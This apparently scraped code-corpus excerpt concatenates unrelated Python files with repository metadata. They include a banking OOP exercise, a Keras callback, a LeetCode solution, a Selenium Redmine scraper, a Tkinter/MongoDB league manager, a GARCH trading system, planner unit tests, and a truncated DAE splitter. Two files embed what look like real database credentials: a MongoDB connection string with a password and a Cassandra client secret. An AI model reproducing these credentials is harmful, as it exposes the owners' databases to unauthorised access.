raport = RaportKonta() #utowrzenie obiektu klasy RaportKonta
print("Raport konto1:")
raport.raport(konto1) #Wywołanie metody raport(), obiektu raport dla zmiennej konto1 będącej obiektem klasy Konto
print("\nRaport konto2:")
raport.raport(konto2) #Wywołanie metody raport(), obiektu raport dla zmiennej konto2 będącej obiektem klasy KontoBankowe
print("\nRaport konto3:")
raport.raport(konto3) #Wywołanie metody raport(), obiektu raport dla zmiennej konto3 będącej obiektem klasy KontoOsobiste
konto3.wplata(100) #Wywołanie metody wplata(), obiektu konto3 dla zmiennej (int = 100) -> stan_konta += 100
print("\nRaport konto3 po wpłacie 100zł:")
raport.raport(konto3) #Wywołanie metody raport(), obiektu raport dla zmiennej konto3 będącej obiektem klasy KontoOsobiste
print("\nRaport konto3 po wypłacie 50zł :")
konto3.wyplata(50) #Wywołanie metody wplata(), obiektu konto3 dla zmiennej (int = 100) -> stan_konta -= 50
raport.raport(konto3) #Wywołanie metody raport(), obiektu raport dla zmiennej konto3 będącej obiektem klasy KontoOsobiste
# Projekt wyjatki:
print("-----------------\nWYJĄTKI\n-----------------")
print("{}zł - stan konta nr1 przed przelewem".format(konto1.get_stan_konta())) #wywołanie metody format() funkcji str oraz metody get_stan_konta klasy Konto
print("{}zł - stan konta nr3 przed przelewem\n".format(konto3.get_stan_konta())) #wywołanie metody format() funkcji str oraz metody get_stan_konta klasy Konto
bank.przelew(0,2,1000) #wywolanie metody przelew klasy Bank dla indeksów 0 i 2 z listy_kont obiektu bank o wartości (int = 1000)
# -> stan_konta (obiekt z listy o indeksie 0) -= 1000, stan_konta (obiekt z listy o indeksie 2) += 1000
print("{}zł - stan konta nr1 po przelewie".format(konto1.get_stan_konta())) #wywołanie metody format() funkcji str oraz metody get_stan_konta klasy Konto
print("{}zł - stan konta nr3 po przelewie\n".format(konto3.get_stan_konta())) #wywołanie metody format() funkcji str oraz metody get_stan_konta klasy Konto
bank.przelew(0,2,1000) #wywolanie metody przelew klasy Bank dla indeksów 0 i 2 z listy_kont obiektu bank o wartości (int = 1000)
# -> wywołanie wyjątku NieudanyPrzelewException i metody jego klasy get_komunikat()
# Projekt obiekty w strukturach danych:
print("-----------------\nOBIEKTY W STRUKTURACH DANYCH\n-----------------")
bank.przelew(2,5,1000) #wywołanie metody przelew klasy Bank dla indeksów 2 i 5 z listy_kont obiektu bank o wartości (int = 1000)
# -> stan_konta (obiekt z listy o indeksie 2) -= 1000, stan_konta (obiekt z listy o indeksie 5) += 1000
bank.usun_konto(5) #wywołanie metody usun_konto klasy Bank dla u 5 z listy_kont obiektu bank
# -> lista_kont obiektu bank zawiera 5 elementów [konto1,konto2,konto3,konto4,konto5]
bank.przelew(2,5,1000) #wywołanie metody przelew klasy Bank dla indeksów 2 i 5 z listy_kont obiektu bank o wartości (int = 1000)
# -> wywołanie wyjątku NumerKontaException i metody jego klasy get_komunikat()
print("\n")
bank.raport_konta_osobiste() #wywołanie metody raport_konta_osobite klasy Bank obiektu bank
# -> wypisanie sumy obiektów klasy KontoOsobite oraz sumy wartości pól stan_konta tych obiektów,
#będących elementami listy lista_kont obiektu bank
print("\n")
bank.raport_wszystkie() #wywołanie metody raport_wszystkie klasy Bank obiektu bank
# -> wypisanie sumy obiektów klasy Konto oraz sumy wartości pól stan_konta tych obiektów,
#będących elementami listy lista_kont obiektu bank
print("-----------------\nITERATORY\n-----------------")
iterator = IteratorBanku(bank) #utworzenie iteratora klasy IteratorBanku dla obiektu bank -> pobranie listy kont obiektu bank
for x in iterator: #wykonanie pętli for dla obiektu iterator -> wypisanie wartości kolejnych pól z listy lista_kont iteratora
print(x)
print("-----------------\nZAPIS OBIEKTÓW\n-----------------")
zapis_banku = ZapisBank() #utowrzenie obiektu zapis_banku klasy ZapisBank
odczyt_banku = OdczytajBank() #utworzenie obiektu odczyt_banku klasy OdczytajBank
try:
zapis_banku.zapisz_na_dysk(bank) # wywołanie metody zapisz_na dysk obiektu zapis_banku dla argumentu bank
# -> zapisanie obiektu bank do pliku
zapis_banku.zapisz_na_dysk(konto1) # wywołanie metody zapisz_na dysk obiektu zapis_banku dla argumentu konto1
# -> wywołanie wyjątku ZapisException
except ZapisException as zapis:
zapis.get_komunikat() # wywołanie metody get_komuniakt wyjatku ZapisExpcetion
del bank #usunięcie obiektu bank
try:
bank.raport_wszystkie() #próba wywolania metody obiektu bank -> wywołanie błedu (obiekt nie istnieje)
except NameError:
print("\nBrak obiektu o podanej nazwie!\n")
bank = odczyt_banku.odczytaj_z_dysku() #utworzenie obiektu bank na podstawie pliku przy pomocy metody odczytaj_z_dysku obiektu odczyt_banku
bank.raport_wszystkie() #wywołanie metody raport_wszystkie obiektu bank klasy Bank
| TheItaroshi/Studies | konto_bankowe/venv/main.py | main.py | py | 7,308 | python | pl | code | 0 | github-code | 36 |
626133283 |
import os
from collections import OrderedDict
import tensorflow as tf
class KBest(tf.keras.callbacks.Callback):
"""
A subclass of the callback preset class which implements the functionality to keep only the best k checkpoints of
the execution (instead of the best one implemented in Tf).
Attributes
----------
output_path: str
Path where the checkpoints are saved
file_loss: dict
Dictionary where we keep the loss of each of the checkpoints saved
k: int
Number of checkpoints to keep
Methods:
----------
on_epoch_end(self, src_input, indices)
At the end of each epoch, we check which of the checkpoints we need to delete (if any)
"""
def __init__(self, output_path, k=None):
"""
Parameters
----------
output_path: str
Path where the checkpoints are saved
k: int
Number of checkpoints to keep
"""
super().__init__()
self.output_path = output_path
self.files_loss = {}
self.k = k
def on_epoch_end(self, epoch, logs=None):
"""
Parameters
----------
epoch: int
Epoch number
logs: dict
Dictionary with the information of the current epoch
"""
if logs is None:
logs = {}
if self.k is not None:
loss = logs["loss"]
name = "weights." + str("{:02d}".format(self.epoch)) + '-' + str("{:.2f}".format(loss)) + '.hdf5'
self.files_loss[name] = loss
if len(self.files_loss) >= self.k:
# sort by value in decreasing order
d_descending = OrderedDict(sorted(self.files_loss.items(), key=lambda kv: kv[1], reverse=True))
n = len(d_descending)
# delete the len(d_descending - k) first files
num_deletions = n - self.k
file_delete = list(d_descending.items())[0:num_deletions]
for name, _ in file_delete:
path = self.output_path + '/ckpt/' + name
os.remove(path)
del self.files_loss[name]
| BNN-UPC/ignnition | ignnition/custom_callbacks.py | custom_callbacks.py | py | 2,203 | python | en | code | 40 | github-code | 36 |
18034417237 | class Solution:
def numRollsToTarget(self, d: int, f: int, target: int) -> int:
# Let dp(d, f, target) be the number of possible dice rolls for the given parameters
# dp(d, f, target) = dp(d-1, f, target-1) + dp(d-1, f, target-2) + ... + dp(d-1, f, target-f)
# The base case occur when d = 0. We can make target = 0 with 0 dice, but nothing else
# So dp(0, f, t) = 0 if t != 0, and dp(0, f, 0) = 1
# Use memoization to avoid repeated calculations and don't consider negative targets
memo = {}
def dp(d, target):
if d == 0:
return 0 if target > 0 else 1
if (d, target) in memo:
return memo[(d, target)]
to_return = 0
for k in range(max(0, target-f), target):
to_return += dp(d-1, k)
memo[(d, target)] = to_return
return to_return
return dp(d, target) % (10**9 + 7) | LittleCrazyDog/LeetCode | 1155-number-of-dice-rolls-with-target-sum/1155-number-of-dice-rolls-with-target-sum.py | 1155-number-of-dice-rolls-with-target-sum.py | py | 987 | python | en | code | 2 | github-code | 36 |
28678725652 | from selenium import webdriver
from selenium.webdriver.common.by import By
from webdriver_manager.firefox import GeckoDriverManager
browser = webdriver.Firefox(executable_path=GeckoDriverManager().install())
codigos = ['22316', '21897', '22469', '22192', '22567', '22153', '21778', '22281', '22941', '22882', '21603', '22740', '21587', '23009', '22500', '22424',
'23167', '22423', '22816', '23103', '22592', '23317', '23067', '22804']
url = 'http://redmine.rs.dbseller.com.br/issues/'
file = open('redmines.txt', 'w')
titulos = []
descricoes = []
descr = []
for codigo in codigos:
browser.get(url+codigo)
file.write(browser.title)
file.write("\n\n")
descricao = browser.find_elements(By.CLASS_NAME, "wiki")
resultado = descricao[1].find_elements(By.TAG_NAME, "p")
for x in resultado:
linha = x.get_attribute('innerHTML')
linha = linha.replace('<br>','')
file.write(linha+"\n")
file.write("\n\n")
file.write("\n\n")
browser.quit() | DaviRamosUC/web_scraping_redmine | index.py | index.py | py | 1,001 | python | en | code | 0 | github-code | 36 |
72774382185 | import tkinter as tk
from tkinter import messagebox
from pymongo import MongoClient
from UserInterface.GlobalResources.GuiObjectsFactories import \
MessageBox, \
ImagedButtonWithText
from UserInterface.MainMenu.MonitoredLeagues.ManageMonitoredLeagues.ManageMonitoredLeagues import \
manage_monitored_leagues
from UserInterface.MainMenu.MonitoredLeagues.AddLeague.AddLeague import add_new_league
def mon_leagues_window(parent):
# ------------------------------ Data handling functions ------------------------------------------
def call_league_data():
"""
Compile league data required for sub-menus
"""
def retrieve_all_leagues():
client = MongoClient('mongodb+srv://RubenFerreira:TPVXAliOZt3OqFpk@11sixteen.zzyri.mongodb.net/test?')
db = client['football_data']
collection = db['leagues']
return collection
def collection_to_list(collection):
leagues_lst = []
for document in collection.find():
leagues_lst.append(document)
return leagues_lst
# --------- main DB call processes ------------
collection = retrieve_all_leagues()
all_leagues_list = collection_to_list(collection)
return all_leagues_list
# ---------------------- Window sub-menu initialisation functions --------------------------
def manage_mon_lea():
# Clear activities panel
for child in act_panel.winfo_children():
child.destroy()
# Send activities panel to function to populated
manage_monitored_leagues(act_panel, leagues_list)
act_panel.grid(column=1, row=0, padx=10, pady=10, sticky='NW')
def add_new_lea():
# Clear activities panel
for child in act_panel.winfo_children():
child.destroy()
# Send activities panel to function to populated
add_new_league(act_panel, leagues_list)
act_panel.grid(column=1, row=0, padx=10, pady=10, sticky='NW')
# ---------------------------------------- Window management --------------------------------
def on_closing():
MsgBox = messagebox.askquestion('Exit Window',
f'Are you sure you want to close this window - Any unsaved changes will be '
f'lost?',
icon='question')
if MsgBox == 'yes':
mon_league_win.destroy()
# ------------------------------------ Main processes -----------------------------------------------------
if parent is not None:
parent.destroy()
# Window Setup
mon_league_win = tk.Tk()
mon_league_win.title("11Sixteen Database Management Controller - Manage Monitored Leagues")
mon_league_win.geometry("%dx%d+0+0" % (mon_league_win.winfo_screenwidth(), mon_league_win.winfo_screenheight()))
mon_league_win.protocol("WM_DELETE_WINDOW", on_closing)
# ----------------- DB call -------------------------
# Message user of delay (while gathering data from DB)
message_box = MessageBox(mon_league_win)
message_box.place(relx=0.5, rely=0.5, anchor='center')
message_box.update_content(mon_league_win, "Collecting monitored league data - one moment")
leagues_list = call_league_data()
message_box.destroy()
# Object creation
nav_panel = tk.Frame(mon_league_win, borderwidth=1, highlightbackground="black", relief='solid')
nav_messenger = MessageBox(nav_panel, "Sub-menu navigation panel", width=25, height=4,
wraplength=100, justify='center')
act_panel = tk.Frame(mon_league_win, borderwidth=1, highlightbackground="black", relief='solid')
man_mon_lea_btn = ImagedButtonWithText(nav_panel,
'C:\\Users\\rferreira\\GitHub\\11Sixteen\\UserInterface\\GlobalResources\\Images_Icons\\manage_monitored_leagues_icon.png',
"LargeGroove", "Manage Monitored Leagues")
add_lea_btn = ImagedButtonWithText(nav_panel,
'C:\\Users\\rferreira\\GitHub\\11Sixteen\\UserInterface\\GlobalResources\\Images_Icons\\add_league.png',
"LargeGroove", "Add New League")
# Object binding
man_mon_lea_btn.btn.config(command=manage_mon_lea)
add_lea_btn.btn.config(command=add_new_lea)
# Object placement
nav_panel.grid(column=0, row=0, padx=10, pady=10, sticky='NW')
nav_messenger.grid(column=0, row=0, padx=10, pady=10, sticky='N')
act_panel.grid(column=1, row=0, padx=10, pady=10, sticky='NW')
man_mon_lea_btn.frame.grid(column=0, row=1, padx=10, pady=10, sticky='N')
add_lea_btn.frame.grid(column=0, row=2, padx=10, pady=10, sticky='N')
# Main window mainloop
mon_league_win.mainloop()
if __name__ == "__main__":
mon_leagues_window(None)
| SigmaFireFox/SigmaFox | apps/eleven10ths/src/app/11sixteen-desktop-app/UserInterface/MainMenu/MonitoredLeagues/MonitoredLeagues.py | MonitoredLeagues.py | py | 4,954 | python | en | code | 0 | github-code | 36 |
25798887132 | grade = ['A+','A0','A-','B+','B0','B-','C+','C0','C-']
t = int(input())
for case in range(1,t+1):
n,k = map(int, input().split())
grade_unit_num = n/10
student_score = []
for i in range(1,n+1):
middle,final,project = map(int, input().split())
score = round(middle*0.35 + final*0.45 + project*0.2)
student_score.append((i,score))
sort_student_score = sorted(student_score, key=lambda x :x[1], reverse=True)
for ranking,(i,score) in enumerate(sort_student_score):
if i == k:
print(f'#{case}', grade[int(ranking//grade_unit_num)])
| 00purplecandy00/Algorithm-Test-03 | 2200072/조교의성적매기기.py | 조교의성적매기기.py | py | 569 | python | en | code | null | github-code | 36 |
14029690592 | from django import forms
from . models import Contact
class ContactForm(forms.ModelForm):
name = forms.CharField(label = "",widget = forms.TextInput(attrs={
'class':'form-control',
'placeholder' : 'Full Name',
'required' : 'required',
}))
email = forms.EmailField(label= '',widget = forms.EmailInput(attrs={
'class':'form-control',
'placeholder' : 'Email',
'required' : 'required',
}))
phone = forms.CharField(label='',widget = forms.TextInput(attrs={
'class':'form-control',
'placeholder' : 'Phone',
'required' : 'required',
}))
message = forms.CharField(label='',widget = forms.Textarea(attrs={
'class':'form-control',
'placeholder' : 'Message',
'required' : 'required',
}))
class Meta:
model = Contact
fields = ['name','email','phone','message']
labels = {
'name':'İsim Soyisim',
'email':'eposta',
} | IbrahimFarukInce/Django-Course-App | smartedu_con/pages/forms.py | forms.py | py | 996 | python | en | code | 0 | github-code | 36 |
1828127496 | import json
import os
from pathlib import Path
from typing import List, Tuple
import numpy as np
from arch import arch_model
from systems_util import get_futures_list, get_settings, normalize_weights
def myTradingSystem(DATE: List[int], CLOSE: np.ndarray, settings) -> Tuple[np.ndarray, dict]:
print(f"Predicting for: {DATE[-1]}")
CLOSE = np.transpose(CLOSE)[1:]
log_return = np.diff(np.log(CLOSE))
positions: List[int] = []
storage_dir = Path(os.path.dirname(__file__)).parent / "../models/garch/correlation.txt"
with open(storage_dir) as f:
cor_dict = json.load(f)
for index, ticker in enumerate(settings["markets"]):
if ticker == "CASH":
positions.append(0)
continue
print(f"Predicting for: {ticker}")
params_dir = Path(os.path.dirname(__file__)).parent / f"../models/garch/params/{ticker}_params.txt"
ticker_returns = log_return[:, index-1]
with open(params_dir) as f:
params = json.load(f)
p = params['p']
q = params['q']
fixed_params = params['params']
model = arch_model(ticker_returns * 10 , p=p, q=q)
fixed_model = model.fix(fixed_params)
forecast_vol = fixed_model.forecast()
var = forecast_vol.variance.iloc[-1:]['h.1']
# flip the inequality signs lol
# if (cor_dict[ticker] > 0.03)
"""
if (float(np.sqrt(var)) > np.std(ticker_returns)):
positions.append(1)
elif (float(np.sqrt(var)) < np.std(ticker_returns)):
positions.append(-1)
else:
positions.append(0)
"""
if (cor_dict[ticker] < 0.3):
if (float(np.sqrt(var)) > np.std(ticker_returns)):
positions.append(1)
else:
positions.append(0)
elif (cor_dict[ticker] > 0.3):
if (float(np.sqrt(var)) > np.std(ticker_returns)):
positions.append(-1)
else:
positions.append(0)
else:
positions.append(0)
positions = normalize_weights(weights=positions)
return positions, settings
def mySettings():
settings = get_settings()
futures = get_futures_list(filter_insignificant_lag=2)
futures_list = ["F_AD", "F_ES"]
settings["markets"] = ["CASH", *futures]
return settings
if __name__ == '__main__':
import quantiacsToolbox
results = quantiacsToolbox.runts(__file__)
| weixue123/quantiacs_algo_trading | systems/garch_system.py | garch_system.py | py | 2,506 | python | en | code | 0 | github-code | 36 |
71193874663 | #Importing the Dependencies
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.applications import MobileNetV2
from tensorflow.keras.layers import AveragePooling2D
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.preprocessing.image import load_img
from tensorflow.keras.utils import to_categorical
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import os
#reading data folder and assigning to classes
data_file = r"data"
classes = ["with_mask", "without_mask"]
data = []
labels = []
for c in classes:
path = os.path.join(data_file, c)
for i in os.listdir(path):
image_path = os.path.join(path, i)
img = load_img(image_path, target_size=(224, 224))
img = img_to_array(img)
image_array = preprocess_input(img)
data.append(image_array)
labels.append(c)
# binarizing labels
binarizer = LabelBinarizer() #creating an instance of LabelBinarizer
binary_labels = binarizer.fit_transform(labels)
labels = to_categorical(binary_labels)
#converting image_array and labels to numpy array
X = np.array(data, dtype="float32")
y = np.array(labels)
#splitting the data and labels
(X_train, X_test, y_train, y_test) = train_test_split(X, y, test_size = 0.2, stratify = labels, random_state = 42)
#generating batches of image data with data augmentation
aug = ImageDataGenerator(rotation_range = 20,
zoom_range = 0.15,
width_shift_range = 0.2,
height_shift_range = 0.2,
shear_range = 0.15,
horizontal_flip = True)
#transfer learning using MobileNet architecture
base_model = MobileNetV2(include_top = False, input_tensor = Input(shape = (224, 224, 3)))
head_model = base_model.output
head_model = AveragePooling2D(pool_size=(7, 7))(head_model)
head_model = Flatten(name="flatten")(head_model)
head_model = Dense(128, activation="relu")(head_model)
head_model = Dropout(0.5)(head_model)
head_model = Dense(2, activation="softmax")(head_model)
model = Model(inputs=base_model.input, outputs=head_model)
#keeping parameters of base_model layers fixed
for layer in base_model.layers:
layer.trainable = False
print("Compiling model...")
#compiling the model
model.compile(optimizer = tf.keras.optimizers.Adam(learning_rate= 0.0001),
loss=tf.keras.losses.BinaryCrossentropy(),
metrics=['accuracy'])
print("Model compiled.")
#training the model
print("Training head...")
hist = model.fit(
aug.flow(X_train, y_train, batch_size=32),
steps_per_epoch=len(X_train) // 32,
validation_data=(X_test, y_test),
validation_steps=len(X_test) // 32,
epochs=20)
#evaluating the model
print("Evaluating model...")
pred_prob = model.predict(X_test, batch_size=32)
pred_id = np.argmax(pred_prob, axis=1)
print(classification_report(y_test.argmax(axis=1), pred_id, target_names=binarizer.classes_))
#saving the model
print("Saving mask detector model...")
model.save("mask_detector2.model", save_format="h5")
#plotting the training loss and accuracy against epoch
epochs = 20
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), hist.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), hist.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), hist.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, epochs), hist.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig("plot.png") | OmololaOkebiorun/Face_Mask_Detection | training.py | training.py | py | 4,037 | python | en | code | 0 | github-code | 36 |
19913113172 | def main():
file = 'Greeting.txt'
displaywithForLoop(file)
print()
displaywithcomprehensionside(file)
createdictionary(file)
createDictionary(file)
def displaywithForLoop(file):
infile = open(file, 'r')
for line in infile:
print(line, end= '')
infile.close
def displaywithcomprehensionside(file):
infile = open(file, 'r')
list = [line.rstrip() for line in infile]
infile.close
print(list)
def createdictionary(file):
infile = open(file,'r')
dictionary = {line.split(",")[0]:line.split(',')[1] .rstrip() for line in infile}
print(dictionary)
def createDictionary(file):
infile = open(file, 'r')
textList = [line.rstrip() for line in infile]
print(textList)
print(' '.join(textList))
print(','.join(textList))
infile.close()
print(dict([x.split(',') for x in textList]))
main() | rongliaoo/2-23 | practice/processingdata.py | processingdata.py | py | 881 | python | en | code | 0 | github-code | 36 |
15062690781 | from cassandra.cluster import Cluster
from cassandra.auth import PlainTextAuthProvider
cloud_config= {
'secure_connect_bundle': 'C:/Users/Damian/Documents/leren-programmeren/python/databasestuff/secure-connect-signup.zip'
}
auth_provider = PlainTextAuthProvider('ckjSgHZotmWyYFbJXRYYcYxU', 'FwJ1SjYdckK26ur43yzeZJQci5uvXzffDF1z31P+E-zBlQFNbNARf.pvEw8YA33A2Q1+XhJOxeq9Y1DqM4n1HK.,_mo2sZ1zTqlQnoeSdnKgm74Z,6BIR70+AKdN.k+J')
cluster = Cluster(cloud=cloud_config, auth_provider=auth_provider)
session = cluster.connect()
row = session.execute("select release_version from system.local").one()
if row:
print(row[0])
else:
print("An error occurred.") | damianslavenburg/leren-programmeren | python/databasestuff/connect_database.py | connect_database.py | py | 668 | python | en | code | 0 | github-code | 36 |
6007494490 | import json
import unittest
from datetime import date
from first_config import Config
from first_data import FirstData
from first_distance import FirstDistance
from first_pace import FirstPace
from first_plan import FirstPlan
from first_race import FirstRaceType, FirstRace
from first_runner import FirstRunner
from first_step import FirstStepBody, FirstStepRepeat
from first_time import FirstTime
from first_workout import FirstWorkout
class TestFirstPlan(unittest.TestCase):
def test_to_string(self):
ws1 = [0, 2, 5]
ws2 = [1, 3, 6]
try: # name only
p1 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws1)
self.assertEqual('Training Plan:\nName - "My first marathon training plan"\nWorkout days: Mon, Wed, Sat\n',
str(p1))
file_name = 'cmp_plan1.tcx'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_string = from_file.read()
self.assertEqual(cmp_string, p1.tcx())
cmp_json = {"name": "My first marathon training plan",
"weekly_schedule": ["mon", "wed", "sat"],
"workouts": []}
self.assertEqual(cmp_json, p1.to_json())
cmp_html = ('<!DOCTYPE html>\n' +
'<html>\n' +
' <head>\n' +
' </head>\n' +
' <body>\n' +
' <h1>Training Plan: My first marathon training plan</h1>\n' +
' <div>\n' +
' <h2>\n' +
' Schedule:\n' +
' </h2>\n' +
' </div>\n' +
' </body>\n' +
'</html>')
self.assertEqual(cmp_html, p1.to_html())
except TypeError as tex:
self.fail(str(tex))
except ValueError as vex:
self.fail(str(vex))
rt1 = FirstRaceType(name='Marathon', distance=FirstDistance.from_string('42.195 km'))
rd1 = date(year=2017, month=7, day=29)
r1 = FirstRace(name='SFM', race_type=rt1, race_date=rd1)
rn1 = FirstRunner(name='DBD')
try: # all
p2 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws2, race=r1, runner=rn1)
cmp_string = ('Training Plan:\nName - "My first marathon training plan"\nWorkout days: Tue, Thu, Sun\n' +
'Race:\n Name - "SFM" of type Marathon - 42.195 km\nRunner:\n Name - "DBD"\n')
self.assertEqual(cmp_string, str(p2))
except TypeError as tex:
self.fail(str(tex))
except ValueError as vex:
self.fail(str(vex))
def test_add_workout(self):
ws1 = [0, 2, 5]
rt1 = FirstRaceType(name='Marathon', distance=FirstDistance.from_string('42.195 km'))
rd1 = date(year=2017, month=7, day=29)
r1 = FirstRace(name='SFM', race_type=rt1, race_date=rd1)
rn1 = FirstRunner(name='DBD')
p1 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws1, race=r1, runner=rn1)
t_warmup = FirstTime.from_string('0:15:00')
p_warmup = FirstPace.from_string('0:10:00 min per mile')
s_warmup = FirstStepBody(name='Warm up', pace=p_warmup, time=t_warmup)
s_repeat = FirstStepRepeat(name='repeat X 8', repeat=8)
d_interval = FirstDistance.from_string('400 m')
p_fast = FirstPace.from_string('0:08:00 min per mile')
s_fast = FirstStepBody(name='Fast', pace=p_fast, distance=d_interval)
s_repeat.add_step(s_fast)
s_slow = FirstStepBody(name='Rest', pace=p_warmup, distance=d_interval)
s_repeat.add_step(s_slow)
t_cooldown = FirstTime.from_string('0:10:00')
s_cooldown = FirstStepBody(name='Cool down', pace=p_warmup, time=t_cooldown)
wo = FirstWorkout(name='Week 1 Key-run 1', workout_date=date(year=2017, month=6, day=24))
wo.add_step(step=s_warmup)
wo.add_step(step=s_repeat)
wo.add_step(step=s_cooldown)
try: # first workout
p1.add_workout(workout=wo)
cmp_string = ('Training Plan:\nName - "My first marathon training plan"\n' +
'Workout days: Mon, Wed, Sat\nRace:\n' +
' Name - "SFM" of type Marathon - 42.195 km\nRunner:\n Name - "DBD"\nWorkouts:\n' +
' "Week 1 Key-run 1"\n Sat 2017-06-24\n scheduled\n' +
'Total 1 workouts\n')
self.assertEqual(cmp_string, str(p1))
file_name = 'cmp_plan2.tcx'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_string = from_file.read()
self.assertEqual(cmp_string, p1.tcx())
file_name = 'cmp_plan2.json'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_json = json.load(from_file)
self.assertEqual(cmp_json, p1.to_json())
file_name = 'cmp_plan2_km.json'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_json = json.load(from_file)
self.assertEqual(cmp_json, p1.to_json(output_unit='km'))
file_name = 'cmp_plan2.html'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_html = from_file.read()
self.assertEqual(cmp_html, p1.to_html())
file_name = 'cmp_plan2_km.html'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_html = from_file.read()
self.assertEqual(cmp_html, p1.to_html(output_unit='km'))
except TypeError as ex:
self.fail(str(ex))
def test_generate_workouts(self):
data = FirstData(json_path=Config.DATABASE_JSON)
ws1 = [0, 2, 5]
target_time = data.equivalent_time(time_from=FirstTime(minutes=30),
race_index_from=data.race_type_index_by_name('5K'),
race_index_to=data.race_type_index_by_name('Marathon'))
sf_marathon = FirstRace(race_type=data.get_race_type_by_name('Marathon'),
name='San Francisco Marathon',
race_date=date(year=2017, month=7, day=23),
target_time=target_time)
me = FirstRunner(name='Daniel BenDavid', age=56, gender='m', email='yossi@gmail.com')
p1 = FirstPlan(name='My first marathon training plan', weekly_schedule=ws1, race=sf_marathon, runner=me)
try: # positive
p1.generate_workouts(data=data)
self.assertEqual(48, len(p1.workouts))
wo = p1.workouts[0]
self.assertEqual('Week 1 Keyrun 1', wo.name)
self.assertEqual(3, len(wo.steps))
step = wo.steps[0]
self.assertEqual('warmup', step.name)
self.assertEqual(0, step.step_id)
self.assertEqual('time', step.get_duration_type())
self.assertEqual('0:15:00', str(step.time))
self.assertEqual('0:11:31 min per mile', str(step.pace))
step = wo.steps[1]
self.assertEqual('repeat X 3', step.name)
self.assertEqual(1, step.step_id)
self.assertEqual(3, step.repeat) # repeat
self.assertEqual(2, len(step.steps))
substep = step.steps[0]
self.assertEqual('1600m', substep.name)
self.assertEqual(2, substep.step_id)
self.assertEqual('distance', substep.get_duration_type())
self.assertEqual('1600.0 m', str(substep.distance))
self.assertEqual('0:09:26 min per mile', str(substep.pace))
substep = step.steps[1]
self.assertEqual('200 m@RI', substep.name)
self.assertEqual(3, substep.step_id)
self.assertEqual('distance', substep.get_duration_type())
self.assertEqual('200.0 m', str(substep.distance))
self.assertEqual('0:11:31 min per mile', str(substep.pace))
step = wo.steps[2]
self.assertEqual('cooldown', step.name)
self.assertEqual(4, step.step_id)
self.assertEqual('time', step.get_duration_type())
self.assertEqual('0:10:00', str(step.time))
self.assertEqual('0:11:31 min per mile', str(step.pace))
file_name = 'cmp_plan_marathon.tcx'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_string = from_file.read()
self.assertEqual(cmp_string, p1.tcx())
file_name = 'cmp_plan_marathon.json'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_json = json.load(from_file)
self.assertEqual(cmp_json, p1.to_json())
file_name = 'cmp_plan_marathon.html'
with open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name), 'r') as from_file:
cmp_html = from_file.read()
self.assertEqual(cmp_html, p1.to_html())
except ValueError as vex:
self.fail(str(vex))
except TypeError as tex:
self.fail(str(tex))
ws1 = [0, 3, 6]
target_time = data.equivalent_time(time_from=FirstTime(minutes=22, seconds=36),
race_index_from=data.race_type_index_by_name('5K'),
race_index_to=data.race_type_index_by_name('HalfMarathon'))
sf_half_marathon = FirstRace(race_type=data.get_race_type_by_name('HalfMarathon'),
name='San Francisco Marathon',
race_date=date(year=2017, month=7, day=23),
target_time=target_time)
me = FirstRunner(name='Daniel BenDavid', age=56, gender='m', email='yossi@gmail.com')
p2 = FirstPlan(name='San Francisco half-marathon training plan', weekly_schedule=ws1,
race=sf_half_marathon, runner=me)
try: # positive
p2.generate_workouts(data=data)
file_name = 'cmp_plan_half_marathon.tcx'
from_file = open('{}/{}'.format(Config.TEST_RESOURCE_DIR, file_name))
cmp_string = from_file.read()
from_file.close()
self.assertEqual(cmp_string, p2.tcx())
except ValueError as vex:
self.fail(str(vex))
except TypeError as tex:
self.fail(str(tex))
if __name__ == '__main__':
unittest.main()
| bendaten/first_trainer | test/test_plan.py | test_plan.py | py | 10,937 | python | en | code | 1 | github-code | 36 |
15947746512 | '''
用于将dea模型中的构件拆分到单独的dae文件中
'''
def process(dae_path, base_output_dae_path):
'''
将dae文件中的一个个构件分开到多个dae文件中
'''
import xml.dom.minidom
import os
import time
if not os.path.exists(dae_path):
print('路径%s不存在' % dae_path)
# 文件夹路径
output_dir = base_output_dae_path + '\\' + dae_path[dae_path.rfind('\\') + 1: dae_path.find('.')]
if not os.path.exists(output_dir):
os.makedirs(output_dir)
doc = xml.dom.minidom.parse(dae_path)
impl = xml.dom.minidom.getDOMImplementation()
# 获取基础的Tag
asset_tag = doc.getElementsByTagName('asset')[0]
effect_tags = doc.getElementsByTagName('effect')
material_tags = doc.getElementsByTagName('material')
geometry_tags = doc.getElementsByTagName('geometry')
node_tags = doc.getElementsByTagName('node')
scene_tag = doc.getElementsByTagName('scene')[0]
print('effect_tags: ', len(effect_tags))
print('material_tags: ', len(material_tags))
print('geometry_tags: ', len(geometry_tags))
